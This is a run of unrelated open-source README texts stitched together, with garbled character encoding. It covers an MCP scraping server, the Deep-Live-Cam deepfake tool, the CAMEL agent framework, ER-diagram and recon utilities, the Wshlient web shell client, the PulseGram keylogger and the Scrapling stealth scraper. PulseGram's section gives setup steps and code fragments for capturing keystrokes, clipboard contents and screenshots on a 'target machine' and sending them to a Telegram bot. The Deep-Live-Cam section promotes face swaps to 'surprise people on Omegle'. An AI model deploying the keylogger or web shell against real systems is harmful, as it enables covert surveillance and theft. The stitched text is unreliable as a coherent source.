"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments:
Returns:
Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments:
Returns:
The server includes comprehensive logging:
Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling:
Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
npm test
MIT License - see LICENSE file for details
Real-time face swap and video deepfake with a single click and only a single image.
This deepfake software is designed to be a productive tool for the AI-generated media industry. It can assist artists in animating custom characters, creating engaging content, and even using models for clothing design.
We are aware of the potential for unethical applications and are committed to preventative measures. A built-in check prevents the program from processing inappropriate media (nudity, graphic content, sensitive material like war footage, etc.). We will continue to develop this project responsibly, adhering to the law and ethics. We may shut down the project or add watermarks if legally required.
Ethical Use: Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online.
Content Restrictions: The software includes built-in checks to prevent processing inappropriate media, such as nudity, graphic content, or sensitive material.
Legal Compliance: We adhere to all relevant laws and ethical guidelines. If legally required, we may shut down the project or add watermarks to the output.
User Responsibility: We are not responsible for end-user actions. Users must ensure their use of the software aligns with ethical standards and legal requirements.
By using this software, you agree to these terms and commit to using it in a manner that respects the rights and dignity of others.
Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online. We are not responsible for end-user actions.
1. Select a face 2. Select which camera to use 3. Press live!
Retain your original mouth for accurate movement using Mouth Mask
Use different faces on multiple subjects simultaneously
Watch movies with any face in real-time
Run Live shows and performances
Create Your Most Viral Meme Yet
Created using Many Faces feature in Deep-Live-Cam
Surprise people on Omegle
Please be aware that the installation requires technical skills and is not for beginners. Consider downloading the prebuilt version.
git clone https://github.com/hacksider/Deep-Live-Cam.git
cd Deep-Live-Cam
**3. Download the Models** 1. [GFPGANv1.4](https://huggingface.co/hacksider/deep-live-cam/resolve/main/GFPGANv1.4.pth) 2. [inswapper\_128\_fp16.onnx](https://huggingface.co/hacksider/deep-live-cam/resolve/main/inswapper_128_fp16.onnx) Place these files in the "**models**" folder. **4. Install Dependencies** We highly recommend using a `venv` to avoid issues. For Windows: python -m venv venv
venv\Scripts\activate
pip install -r requirements.txt
**For macOS:** Apple Silicon (M1/M2/M3) requires specific setup: # Install Python 3.10 (specific version is important)
brew install python@3.10
# Install tkinter package (required for the GUI)
brew install python-tk@3.10
# Create and activate virtual environment with Python 3.10
python3.10 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
** In case something goes wrong and you need to reinstall the virtual environment ** # Deactivate the virtual environment
rm -rf venv
# Reinstall the virtual environment
python -m venv venv
source venv/bin/activate
# install the dependencies again
pip install -r requirements.txt
**Run:** If you don't have a GPU, you can run Deep-Live-Cam using `python run.py`. Note that initial execution will download models (~300MB). ### GPU Acceleration **CUDA Execution Provider (Nvidia)** 1. Install [CUDA Toolkit 11.8.0](https://developer.nvidia.com/cuda-11-8-0-download-archive) 2. Install dependencies: pip uninstall onnxruntime onnxruntime-gpu
pip install onnxruntime-gpu==1.16.3
3. Usage: python run.py --execution-provider cuda
**CoreML Execution Provider (Apple Silicon)** Apple Silicon (M1/M2/M3) specific installation: 1. Make sure you've completed the macOS setup above using Python 3.10. 2. Install dependencies: pip uninstall onnxruntime onnxruntime-silicon
pip install onnxruntime-silicon==1.13.1
3. Usage (important: specify Python 3.10): python3.10 run.py --execution-provider coreml
**Important Notes for macOS:** - You **must** use Python 3.10, not newer versions like 3.11 or 3.13 - Always run with `python3.10` command not just `python` if you have multiple Python versions installed - If you get error about `_tkinter` missing, reinstall the tkinter package: `brew reinstall python-tk@3.10` - If you get model loading errors, check that your models are in the correct folder - If you encounter conflicts with other Python versions, consider uninstalling them: ```bash # List all installed Python versions brew list | grep python # Uninstall conflicting versions if needed brew uninstall --ignore-dependencies python@3.11 python@3.13 # Keep only Python 3.10 brew cleanup ``` **CoreML Execution Provider (Apple Legacy)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-coreml
pip install onnxruntime-coreml==1.13.1
2. Usage: python run.py --execution-provider coreml
**DirectML Execution Provider (Windows)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-directml
pip install onnxruntime-directml==1.15.1
2. Usage: python run.py --execution-provider directml
**OpenVINOβ’ Execution Provider (Intel)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-openvino
pip install onnxruntime-openvino==1.15.0
2. Usage: python run.py --execution-provider openvino
1. Image/Video Mode
python run.py
.2. Webcam Mode
python run.py
.Check out these helpful guides to get the most out of Deep-Live-Cam:
Visit our official blog for more tips and tutorials.
options:
-h, --help show this help message and exit
-s SOURCE_PATH, --source SOURCE_PATH select a source image
-t TARGET_PATH, --target TARGET_PATH select a target image or video
-o OUTPUT_PATH, --output OUTPUT_PATH select output file or directory
--frame-processor FRAME_PROCESSOR [FRAME_PROCESSOR ...] frame processors (choices: face_swapper, face_enhancer, ...)
--keep-fps keep original fps
--keep-audio keep original audio
--keep-frames keep temporary frames
--many-faces process every face
--map-faces map source target faces
--mouth-mask mask the mouth region
--video-encoder {libx264,libx265,libvpx-vp9} adjust output video encoder
--video-quality [0-51] adjust output video quality
--live-mirror the live camera display as you see it in the front-facing camera frame
--live-resizable the live camera frame is resizable
--max-memory MAX_MEMORY maximum amount of RAM in GB
--execution-provider {cpu} [{cpu} ...] available execution provider (choices: cpu, ...)
--execution-threads EXECUTION_THREADS number of execution threads
-v, --version show program's version number and exit
Looking for a CLI mode? Using the -s/--source argument will make the run program in cli mode.
We are always open to criticism and are ready to improve, that's why we didn't cherry-pick anything.
π« CAMEL is an open-source community dedicated to finding the scaling laws of agents. We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks. To facilitate research in this field, we implement and support various types of agents, tasks, prompts, models, and simulated environments.
The framework is designed to support systems with millions of agents, ensuring efficient coordination, communication, and resource management at scale.
Agents maintain stateful memory, enabling them to perform multi-step interactions with environments and efficiently tackle sophisticated tasks.
Every line of code and comment serves as a prompt for agents. Code should be written clearly and readably, ensuring both humans and agents can interpret it effectively.
We are a community-driven research collective comprising over 100 researchers dedicated to advancing frontier research in Multi-Agent Systems. Researchers worldwide choose CAMEL for their studies based on the following reasons.
β | Large-Scale Agent System | Simulate up to 1M agents to study emergent behaviors and scaling laws in complex, multi-agent environments. |
β | Dynamic Communication | Enable real-time interactions among agents, fostering seamless collaboration for tackling intricate tasks. |
β | Stateful Memory | Equip agents with the ability to retain and leverage historical context, improving decision-making over extended interactions. |
β | Support for Multiple Benchmarks | Utilize standardized benchmarks to rigorously evaluate agent performance, ensuring reproducibility and reliable comparisons. |
β | Support for Different Agent Types | Work with a variety of agent roles, tasks, models, and environments, supporting interdisciplinary experiments and diverse research applications. |
β | Data Generation and Tool Integration | Automate the creation of large-scale, structured datasets while seamlessly integrating with multiple tools, streamlining synthetic data generation and research workflows. |
Installing CAMEL is a breeze thanks to its availability on PyPI. Simply open your terminal and run:
pip install camel-ai
This example demonstrates how to create a ChatAgent
using the CAMEL framework and perform a search query using DuckDuckGo.
bash pip install 'camel-ai[web_tools]'
bash export OPENAI_API_KEY='your_openai_api_key'
```python from camel.models import ModelFactory from camel.types import ModelPlatformType, ModelType from camel.agents import ChatAgent from camel.toolkits import SearchToolkit
model = ModelFactory.create( model_platform=ModelPlatformType.OPENAI, model_type=ModelType.GPT_4O, model_config_dict={"temperature": 0.0}, )
search_tool = SearchToolkit().search_duckduckgo
agent = ChatAgent(model=model, tools=[search_tool])
response_1 = agent.step("What is CAMEL-AI?") print(response_1.msgs[0].content) # CAMEL-AI is the first LLM (Large Language Model) multi-agent framework # and an open-source community focused on finding the scaling laws of agents. # ...
response_2 = agent.step("What is the Github link to CAMEL framework?") print(response_2.msgs[0].content) # The GitHub link to the CAMEL framework is # https://github.com/camel-ai/camel. ```
For more detailed instructions and additional configuration options, check out the installation section.
After running, you can explore our CAMEL Tech Stack and Cookbooks at docs.camel-ai.org to build powerful multi-agent systems.
We provide a demo showcasing a conversation between two ChatGPT agents playing roles as a python programmer and a stock trader collaborating on developing a trading bot for stock market.
Explore different types of agents, their roles, and their applications.
Please reach out to us on CAMEL discord if you encounter any issue set up CAMEL.
Core components and utilities to build, operate, and enhance CAMEL-AI agents and societies.
Module | Description |
---|---|
Agents | Core agent architectures and behaviors for autonomous operation. |
Agent Societies | Components for building and managing multi-agent systems and collaboration. |
Data Generation | Tools and methods for synthetic data creation and augmentation. |
Models | Model architectures and customization options for agent intelligence. |
Tools | Tools integration for specialized agent tasks. |
Memory | Memory storage and retrieval mechanisms for agent state management. |
Storage | Persistent storage solutions for agent data and states. |
Benchmarks | Performance evaluation and testing frameworks. |
Interpreters | Code and command interpretation capabilities. |
Data Loaders | Data ingestion and preprocessing tools. |
Retrievers | Knowledge retrieval and RAG components. |
Runtime | Execution environment and process management. |
Human-in-the-Loop | Interactive components for human oversight and intervention. |
--- |
We believe that studying these agents on a large scale offers valuable insights into their behaviors, capabilities, and potential risks.
Explore our research projects:
Research with US
We warmly invite you to use CAMEL for your impactful research.
Rigorous research takes time and resources. We are a community-driven research collective with 100+ researchers exploring the frontier research of Multi-agent Systems. Join our ongoing projects or test new ideas with us, reach out via email for more information.
![]()
For more details, please see our Models Documentation
.
Data (Hosted on Hugging Face)
Dataset | Chat format | Instruction format | Chat format (translated) |
---|---|---|---|
AI Society | Chat format | Instruction format | Chat format (translated) |
Code | Chat format | Instruction format | x |
Math | Chat format | x | x |
Physics | Chat format | x | x |
Chemistry | Chat format | x | x |
Biology | Chat format | x | x |
Dataset | Instructions | Tasks |
---|---|---|
AI Society | Instructions | Tasks |
Code | Instructions | Tasks |
Misalignment | Instructions | Tasks |
Practical guides and tutorials for implementing specific functionalities in CAMEL-AI agents and societies.
Cookbook | Description |
---|---|
Creating Your First Agent | A step-by-step guide to building your first agent. |
Creating Your First Agent Society | Learn to build a collaborative society of agents. |
Message Cookbook | Best practices for message handling in agents. |
Cookbook | Description |
---|---|
Tools Cookbook | Integrating tools for enhanced functionality. |
Memory Cookbook | Implementing memory systems in agents. |
RAG Cookbook | Recipes for Retrieval-Augmented Generation. |
Graph RAG Cookbook | Leveraging knowledge graphs with RAG. |
Track CAMEL Agents with AgentOps | Tools for tracking and managing agents in operations. |
Cookbook | Description |
---|---|
Data Generation with CAMEL and Finetuning with Unsloth | Learn how to generate data with CAMEL and fine-tune models effectively with Unsloth. |
Data Gen with Real Function Calls and Hermes Format | Explore how to generate data with real function calls and the Hermes format. |
CoT Data Generation and Upload Data to Huggingface | Uncover how to generate CoT data with CAMEL and seamlessly upload it to Huggingface. |
CoT Data Generation and SFT Qwen with Unsolth | Discover how to generate CoT data using CAMEL and SFT Qwen with Unsolth, and seamlessly upload your data and model to Huggingface. |
Cookbook | Description |
---|---|
Role-Playing Scraper for Report & Knowledge Graph Generation | Create role-playing agents for data scraping and reporting. |
Create A Hackathon Judge Committee with Workforce | Building a team of agents for collaborative judging. |
Dynamic Knowledge Graph Role-Playing: Multi-Agent System with dynamic, temporally-aware knowledge graphs | Builds dynamic, temporally-aware knowledge graphs for financial applications using a multi-agent system. It processes financial reports, news articles, and research papers to help traders analyze data, identify relationships, and uncover market insights. The system also utilizes diverse and optional element node deduplication techniques to ensure data integrity and optimize graph structure for financial decision-making. |
Customer Service Discord Bot with Agentic RAG | Learn how to build a robust customer service bot for Discord using Agentic RAG. |
Customer Service Discord Bot with Local Model | Learn how to build a robust customer service bot for Discord using Agentic RAG which supports local deployment. |
Cookbook | Description |
---|---|
Video Analysis | Techniques for agents in video data analysis. |
3 Ways to Ingest Data from Websites with Firecrawl | Explore three methods for extracting and processing data from websites using Firecrawl. |
Create AI Agents that work with your PDFs | Learn how to create AI agents that work with your PDFs using Chunkr and Mistral AI. |
For those who'd like to contribute code, we appreciate your interest in contributing to our open-source initiative. Please take a moment to review our contributing guidelines to get started on a smooth collaboration journey.π
We also welcome you to help CAMEL grow by sharing it on social media, at events, or during conferences. Your support makes a big difference!
For more information please contact camel-ai@eigent.ai
GitHub Issues: Report bugs, request features, and track development. Submit an issue
Discord: Get real-time support, chat with the community, and stay updated. Join us
X (Twitter): Follow for updates, AI insights, and key announcements. Follow us
Ambassador Project: Advocate for CAMEL-AI, host events, and contribute content. Learn more
@inproceedings{li2023camel,
title={CAMEL: Communicative Agents for "Mind" Exploration of Large Language Model Society},
author={Li, Guohao and Hammoud, Hasan Abed Al Kader and Itani, Hani and Khizbullin, Dmitrii and Ghanem, Bernard},
booktitle={Thirty-seventh Conference on Neural Information Processing Systems},
year={2023}
}
Special thanks to Nomic AI for giving us extended access to their data set exploration tool (Atlas).
We would also like to thank Haya Hammoud for designing the initial logo of our project.
We implemented amazing research ideas from other works for you to build, compare and customize your agents. If you use any of these modules, please kindly cite the original works: - TaskCreationAgent
, TaskPrioritizationAgent
and BabyAGI
from Nakajima et al.: Task-Driven Autonomous Agent. [Example]
PersonaHub
from Tao Ge et al.: Scaling Synthetic Data Creation with 1,000,000,000 Personas. [Example]
Self-Instruct
from Yizhong Wang et al.: SELF-INSTRUCT: Aligning Language Models with Self-Generated Instructions. [Example]
The source code is licensed under Apache 2.0.
Website β’ Documentation β’ Roadmap
Liam ERD generates beautiful, interactive ER diagrams from your database. Whether you're working on public or private repositories, Liam ERD helps you visualize complex schemas with ease.
Insert liambx.com/erd/p/
into your schema file's URL:
# Original: https://github.com/user/repo/blob/master/db/schema.rb
# Modified: https://liambx.com/erd/p/github.com/user/repo/blob/master/db/schema.rb
πΎ^^^^^^^^^^^^^^^^πΎ
Run the interactive setup:
npx @liam-hq/cli init
If you find this project helpful, please give it a star! β
Your support helps us reach a wider audience and continue development.
Check out the full documentation on the website.
See what we're working on and what's coming next on our roadmap.
SubGPT looks at subdomains you have already discovered for a domain and uses BingGPT to find more. Best part? It's free!
The following subdomains were found by this tool with these 30 subdomains as input.
call-prompts-staging.example.com
dclb02-dca1.prod.example.com
activedirectory-sjc1.example.com
iadm-staging.example.com
elevatenetwork-c.example.com
If you like my work, you can support me with as little as $1, here :)
pip install subgpt
git clone https://github.com/s0md3v/SubGPT && cd SubGPT && python setup.py install
cookies.json
Note: Any issues regarding BingGPT itself should be reported EdgeGPT, not here.
It is supposed to be used after you have discovered some subdomains using all other methods. The standard way to run SubGPT is as follows:
subgpt -i input.txt -o output.txt -c /path/to/cookies.json
If you don't specify an output file, the output will be shown in your terminal (stdout
) instead.
To generate subdomains and not resolve them, use the --dont-resolve
option. It's a great way to see all subdomains generated by SubGPT and/or use your own resolver on them.
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/
and /page/2/
- blog posts and similar human written content e.g. /posts/a-brief-history-of-time
- urls with same path but parameter value difference e.g. /page.php?id=1
and /page.php?id=2
- images, js, css and other "useless" files
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of python, use
pip
instead ofpipx
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.
uro -i input.txt -o output.txt
-w/--whitelist
)uro will ignore all other extensions except the ones provided.
uro -w php asp html
Note: Extensionless pages e.g. /books/1
will still be included. To remove them too, use --filter hasext
.
-b/--blacklist
)uro will ignore the given extensions.
uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext
.
For granular control, uro supports the following filters:
http://example.com/page.php?id=
http://example.com/page.php
http://example.com/page.php
http://example.com/page
.jpg
which would be removed otherwisehttp://example.com/page/
Example: uro --filters hasexts hasparams
Web Shell Client
Wshlient
is a web shell client designed to be pretty simple yet versatile. One just need to create a text file containing an HTTP request and inform where Wshlient
inject the commands, then you can enjoy a shell.
In the case the above video does not works for you:
Out of python's included batteries Wshclient
only uses requests
. Just install it directly or using requirements.txt
:
$ git clone https://github.com/gildasio/wshlient
$ cd wshlient
$ pip install -r requirements.txt
$ ./wshlient.py -h
Alternatively you can also create a symbolic link in your $PATH
to use it directly anywhere in the system:
$ ln -s $PWD/wshlient.py /usr/local/bin/wshlient
$ ./wshlient.py -h
usage: wshlient.py [-h] [-d] [-i] [-ne] [-it INJECTION_TOKEN] [-st START_TOKEN] [-et END_TOKEN] req
positional arguments:
req File containing raw http request
options:
-h, --help show this help message and exit
-d, --debug Enable debug output
-i, --ifs Replaces whitespaces with $IFS
-ne, --no-url-encode Disable command URL encode
-it INJECTION_TOKEN, --injection-token INJECTION_TOKEN
Token to be replaced by commands (default: INJECT)
-st START_TOKEN, --start-token START_TOKEN
Token that marks the output beginning
-et END_TOKEN, --end-token END_TOKEN
Token that marks the output ending
You can contribute to Wshlient
by:
Feel free to do it, but keep in mind to keep it simple.
PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts.
β οΈ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.
Β
_____ _ _____
| __ \ | | / ____|
| |__) | _| |___ ___| | __ _ __ __ _ _ __ ___
| ___/ | | | / __|/ _ \ | |_ | '__/ _` | '_ ` _ \
| | | |_| | \__ \ __/ |__| | | | (_| | | | | | |
|_| \__,_|_|___/\___|\_____|_| \__,_|_| |_| |_|
Author: Omar Salazar
Version: V.1.0
errors_log.txt
file to facilitate debugging.
Clone the repository: bash git clone https://github.com/TaurusOmar/pulsegram cd pulsegram
Install dependencies: Make sure you have Python 3 and pip installed. Then run: bash pip install -r requirements.txt
Set up the Telegram bot token: Create a bot on Telegram using BotFather. Copy your token and paste it into the code in main.py
where the bot is initialized.
Copy yout ChatID chat_id="131933xxxx"
in keylogger.py
Run the tool on the target machine with:
python pulsegram.py
This is the main file of the tool, which initializes the bot and launches asynchronous tasks to capture and send data.
Bot(token="...")
: Initializes the Telegram bot with your personal token.asyncio.gather(...)
: Launches multiple tasks to execute clipboard monitoring, screenshot capture, and keystroke logging.log_error
: In case of errors, logs them in an errors_log.txt file.
This module contains auxiliary functions that assist the overall operation of the tool.
log_error()
: Logs any errors in errors_log.txt with a date and time format.get_clipboard_content()
: Captures the current content of the clipboard.capture_screenshot()
: Takes a screenshot and temporarily saves it to send it to the Telegram bot.
This module handles keylogging, clipboard monitoring, and screenshot captures.
capture_keystrokes(bot)
: Asynchronous function that captures keystrokes and sends the information to the Telegram bot.send_keystrokes_to_telegram(bot)
: This function sends the accumulated keystrokes to the bot.capture_screenshots(bot)
: Periodically captures an image of the screen and sends it to the bot.log_clipboard(bot)
: Sends the contents of the clipboard to the bot.
Change the capture and information sending time interval.
async def send_keystrokes_to_telegram(bot):
global keystroke_buffer
while True:
await asyncio.sleep(1) # Change the key sending interval
async def capture_screenshots(bot):
while True:
await asyncio.sleep(30) # Change the screenshot capture interval
try:
async def log_clipboard(bot):
previous_content = ""
while True:
await asyncio.sleep(5) # Change the interval to check for clipboard changes
current_content = get_clipboard_content()
This project is for educational purposes only and for security testing in your own environments or with express authorization. Unauthorized use of this tool may violate local laws and privacy policies.
Contributions are welcome. Please ensure to respect the code of conduct when collaborating.
This project is licensed under the MIT License.
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
Fetcher
class.PlayWrightFetcher
class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!StealthyFetcher
and PlayWrightFetcher
classes.from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
# | Library | Time (ms) | vs Scrapling |
---|---|---|---|
1 | Scrapling | 5.44 | 1.0x |
2 | Parsel/Scrapy | 5.53 | 1.017x |
3 | Raw Lxml | 6.76 | 1.243x |
4 | PyQuery | 21.96 | 4.037x |
5 | Selectolax | 67.12 | 12.338x |
6 | BS4 with Lxml | 1307.03 | 240.263x |
7 | MechanicalSoup | 1322.64 | 243.132x |
8 | BS4 with html5lib | 3373.75 | 620.175x |
As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.
Library | Time (ms) | vs Scrapling |
---|---|---|
Scrapling | 2.51 | 1.0x |
AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and it returns full element Adaptor
objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.
All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.
pip3 install scrapling
Then run this command to install browsers' dependencies needed to use Fetcher classes
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor
object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor
class to create an Adaptor
instance and start playing around with the page.
You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: auto_match
, huge_tree
, keep_comments
, keep_cdata
, storage
, and storage_args
, which are the same ones you give to the Adaptor
class.
If you don't want to pass arguments to the generated Adaptor
object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the Response
object returned from all fetchers is the same as the Adaptor
object except it has these added attributes: status
, reason
, cookies
, headers
, history
, and request_headers
. All cookies
, headers
, and request_headers
are always of type dictionary
.
[!NOTE] The
auto_match
argument is enabled by default which is the one you should care about the most as you will see later.
This class is built on top of httpx with additional configuration options, here you can do GET
, POST
, PUT
, and DELETE
requests.
For all methods, you have stealthy_headers
which makes Fetcher
create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries
for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher
methods is 3.
Hence: All headers generated by
stealthy_headers
argument can be overwritten by you through theheaders
argument
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome
argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode
option.
Hence using the
real_chrome
argument requires that you have Chrome browser installed on your device
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
# do something with it...
You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor
object as an argument and return True
if the condition satisfies or False
otherwise like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
